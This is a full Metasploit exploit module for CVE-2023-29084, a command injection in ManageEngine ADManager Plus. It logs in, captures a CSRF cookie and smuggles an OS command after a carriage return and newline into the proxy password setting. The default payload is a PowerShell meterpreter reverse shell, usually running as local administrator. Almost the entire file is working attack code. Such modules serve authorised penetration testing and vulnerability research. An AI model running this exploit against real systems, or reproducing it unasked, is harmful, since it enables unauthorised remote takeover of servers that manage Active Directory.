## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient require 'json' def initialize(info = {}) super( update_info( info, 'Name' => 'ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection', 'Description' => %q{ ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient validation of user input when performing the ChangePasswordAction function before passing it into a string that is later used as an OS command to execute. By making a POST request to /api/json/admin/saveServerSettings with a params POST parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user running ADManager Plus, which will typically be the local administrator. Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings, so this vulnerability does require authentication to exploit. As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads with this exploit, since these will use HTTP connections that will be affected by the change in configuration. }, 'Author' => [ 'Simon Humbert', # Disclosure of bug via ZDI 'Dinh Hoang', # Aka hnd3884. Writeup and PoC 'Grant Willcox', # Metasploit module ], 'References' => [ ['CVE', '2023-29084'], ['URL', 'https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/'], # Writeup ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-438/'], # ZDI Advisory ['URL', 'https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html'], # Advisory ['URL', 'https://www.manageengine.com/products/ad-manager/release-notes.html'] # Release Notes and Reporter Acknowledgement ], 'DisclosureDate' => '2023-04-12', 'License' => MSF_LICENSE, 'Platform' => 'win', 'Arch' => [ARCH_CMD], 'Privileged' => true, 'Payload' => { 'BadChars' => "\x22\x0A\x0D\x00[{}]:," # Avoid double quotes, aka 0x22, and some other characters that might cause issues. }, 'Targets' => [ [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell/meterpreter/reverse_tcp' }, 'Payload' => { 'Compat' => { 'ConnectionType' => 'reverse bind none' } } } ], ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 8080 }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES] # We are changing the proxy settings for every HTTP connection on the target server. } ) ) register_options( [ OptString.new('USERNAME', [true, 'The user to log into ADManager Plus as', 'admin']), OptString.new('PASSWORD', [true, 'The password to log in with', 'admin']), OptString.new('DOMAIN', [true, 'The domain to log into', 'ADManager Plus Authentication']) ] ) end def login(username, password, domain) res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'j_security_check'), 'method' => 'POST', 'vars_get' => { 'LogoutFromSSO' => 'true' }, 'vars_post' => { 'is_admp_pass_encrypted' => 'false', # Optional but better to keep it in here to match normal request. 'j_username' => username, 'j_password' => password, 'domainName' => domain, 'AUTHRULE_NAME' => 'ADAuthenticator' }, 'keep_cookies' => true ) unless res && (res.code == 302 || res.code == 303) fail_with(Failure::NoAccess, 'Could not log in successfully!') end print_good('Logged in successfully!') end def check res = send_request_cgi( 'uri' => target_uri.path, 'method' => 'GET' ) unless res && res.code == 200 && res.body return CheckCode::Unknown('Browsing to root of website returned a non-200 or empty response!') end unless res.body&.match(/\.val\('ADManager Plus Authentication'\)/) return CheckCode::Safe('Target is not running ADManager Plus!') end build_number = res.body&.match(/src=".+\.js\?v=(\d{4})"/) unless build_number return CheckCode::Unknown('Home page did not leak the build number via the ?v= parameter as expected!') end build_number = build_number[1] print_good("The target is running AdManager Plus build #{build_number}!") # Versions 7181 and later are patched, everything prior is vulnerable. target_build = Rex::Version.new(build_number) if target_build >= Rex::Version.new('7181') CheckCode::Safe('Target is running a patched version of AdManager Plus!') elsif target_build < Rex::Version.new('7181') CheckCode::Appears('Target appears to be running a vulnerable version of AdManager Plus!') else CheckCode::Unknown("An unknown error occurred when trying to parse the build number: #{build_number}. Please report this error!") end end def exploit res = send_request_cgi( 'uri' => target_uri.path, 'method' => 'GET', 'keep_cookies' => true ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code!') end login(datastore['USERNAME'], datastore['PASSWORD'], datastore['DOMAIN']) # We need to do this post login otherwise we will get errors. This also ensures we get updated # cookies post login as these can sometimes change post login process. res = send_request_cgi( 'uri' => target_uri.path, 'method' => 'GET', 'keep_cookies' => true ) unless res && res.code == 200 fail_with(Failure::UnexpectedReply, 'Home page of target did not respond with the expected 200 OK code post authentication!') end # Check that we actually got our cookies updated post authentication and visiting the homepage. unless res&.get_cookies&.match(/adscsrf=.*?;.*?;.*?_zcsr_tmp=.*?;/) fail_with(Failure::UnexpectedReply, 'Target did not respond with the expected updated cookies after logging in and visiting the home page.') end @csrf_cookie = nil for cookie in @cookie_jar&.cookies if cookie.name == 'adscsrf' @csrf_cookie = cookie.value break end end fail_with(Failure::NoAccess, 'Could not obtain adscrf cookie!') if @csrf_cookie.blank? retrieve_original_settings begin modify_proxy(create_params_value_enable(payload.encoded)) ensure modify_proxy(create_params_value_restore) end end def retrieve_original_settings res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'getServerSettings'), 'method' => 'POST', 'vars_post' => { 'adscsrf' => @csrf_cookie }, 'keep_cookies' => true } ) unless res && res.code == 200 && res&.body&.match(/ads_admin_notifications/) fail_with(Failure::UnexpectedReply, 'Was unable to get the admin settings for restoration!') end json_body = JSON.parse(res.body) server_details = json_body['serverDetails'] unless server_details fail_with(Failure::UnexpectedReply, 'Was unable to retrieve the server settings!') end server_details.each do |elm| next unless elm['tabId'] == 'proxy' @original_port = elm['PORT'] @original_password = elm['PASSWORD'] @proxy_enabled = elm['ENABLE_PROXY'] @original_server_name = elm['SERVER_NAME'] @original_user_name = elm['USER_NAME'] break end end def modify_proxy(params) res = send_request_cgi( { 'uri' => normalize_uri(target_uri.path, 'api', 'json', 'admin', 'saveServerSettings'), 'method' => 'POST', 'vars_post' => { 'adscsrf' => @csrf_cookie, 'params' => params }, 'keep_cookies' => true } ) if res && res.code == 200 if res.body&.match(/{"isAuthorized":false}/) fail_with(Failure::NoAccess, 'Somehow we became unauthenticated during exploitation!') elsif res.body&.match(/Successfully updated the following settings.*-.*Proxy Settings/) print_warning("Settings successfully changed confirmation received before timeout occurred. Its possible the payload didn't execute!") elsif res.body&.match(/"status":"error"/) print_error("The payload somehow triggered an error on the target's side! Error was: #{res.body}") else fail_with(Failure::PayloadFailed, 'Was not able to successfully update the settings to execute the payload!') end elsif res.nil? print_good('Request timed out. Its likely the payload executed successfully!') else fail_with(Failure::UnexpectedReply, "Target responded with a non-200 OK code to our saveServerSettings request! Code was #{res.code}") end end def create_params_value_enable(cmd) [ { tabId: 'proxy', ENABLE_PROXY: true, SERVER_NAME: 'localhost', # In my experience this worked most reliably. USER_NAME: Rex::Text.rand_text_alphanumeric(4..20).to_s, PASSWORD: "#{Rex::Text.rand_text_alphanumeric(4..20)}\r\n#{cmd}", PORT: datastore['RPORT'] # In my experience, setting this to the same PORT as the web server worked reliably. } ].to_json end def create_params_value_restore [ { tabId: 'proxy', ENABLE_PROXY: @proxy_enabled, SERVER_NAME: @original_server_name, USER_NAME: @original_user_name, PASSWORD: @original_password, PORT: @original_port } ].to_json end end